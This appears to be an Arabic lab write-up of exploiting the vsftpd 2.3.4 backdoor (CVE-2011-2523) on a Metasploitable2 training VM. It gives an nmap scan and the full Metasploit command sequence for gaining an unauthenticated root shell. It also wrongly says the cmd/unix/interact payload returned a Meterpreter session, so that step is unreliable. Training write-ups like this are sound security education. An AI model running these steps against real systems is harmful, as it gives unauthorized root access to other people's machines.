
استغلال الباب الخلفي لـ vsftpd 2.3.4 (CVE-2011-2523) على Metasploitable2 — كتابة مخبرية عملية في الاختراق تغطي الاستطلاع والاستغلال والمعالجة.
مختبر عملي يوضح اكتشاف واستغلال ثغرة خلفية معروفة في vsftpd 2.3.4، باستخدام بيئة معزولة من Kali Linux ↔ Metasploitable2.
ممارسة سير العمل الأساسي لاختبار الاختراق — الاستطلاع، تحديد الثغرات، الاستغلال، والتحقق بعد الاستغلال — ضد جهاز هدف ضعيف عمدًا.
| المكوّن | التفاصيل |
|---|---|
| المهاجم | Kali Linux 2026.1 (VMware) |
| الهدف | Metasploitable2 (VMware) |
| الشبكة | NAT، معزولة عن المضيف/الإنترنت |
| عنوان الهدف | 192.168.233.129 |
تم إبقاء الجهازين الافتراضيين على نفس مقطع الشبكة الخاصة، معزولين عن الشبكة الحقيقية، لضمان عدم وجود أي تعرّض خارجي أثناء التمرين.
nmap -sV -sC 192.168.233.129
تم فحص الهدف بحثًا عن المنافذ المفتوحة وإصدارات الخدمات. تضمنت النتائج:
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
22/tcp open ssh OpenSSH 4.7p1 Debian
23/tcp open telnet Linux telnetd
25/tcp open smtp Postfix smtpd
...

كان المنفذ 21 يشغّل vsftpd 2.3.4. من المعروف علنًا أن هذا الإصدار المحدد يحتوي على ثغرة خلفية: في عام 2011، تم اختراق الأرشيف الرسمي للشفرة المصدرية لـ vsftpd وأُدرجت فيه شفرة خبيثة. يؤدي تسجيل الدخول باسم مستخدم يحتوي على السلسلة :) إلى تشغيل مستمع خفي على منفذ TCP 6200، مما يمنح غلافًا بعيدًا دون مصادقة.
msfconsole
use exploit/unix/ftp/vsftpd_234_backdoor
set RHOSTS 192.168.233.129
set payload cmd/unix/interact
run
نجح الاستغلال في تفعيل الثغرة الخلفية وأعاد جلسة Meterpreter.

sessions -i 1
sysinfo
getuid
تم تأكيد الجلسة النشطة ومستوى الوصول على الجهاز المخترق.


تم الحصول على وصول كامل لغلاف بعيد بصلاحيات root إلى الجهاز الهدف، دون الحاجة إلى أي مصادقة، من خلال استغلال خدمة واحدة قديمة ومخترقة بثغرة خلفية.
كانت خدمة واحدة قديمة تحمل ثغرة معروفة وعلنية كافية لاختراق النظام بالكامل — دون الحاجة إلى تطوير استغلال مخصص أو تقنية متقدمة. يسلط هذا الضوء على سبب كون إدارة التصحيحات والنظافة الإصدارية أساسًا للوضع الأمني في العالم الحقيقي.
تم تنفيذ هذا التمرين حصريًا ضد Metasploitable2، وهي آلة افتراضية ضعيفة عمدًا مصممة للتدريب الأمني، داخل شبكة مختبر معزولة لا يوجد بها أي اتصال بأنظمة الإنتاج أو البنية التحتية الخارجية.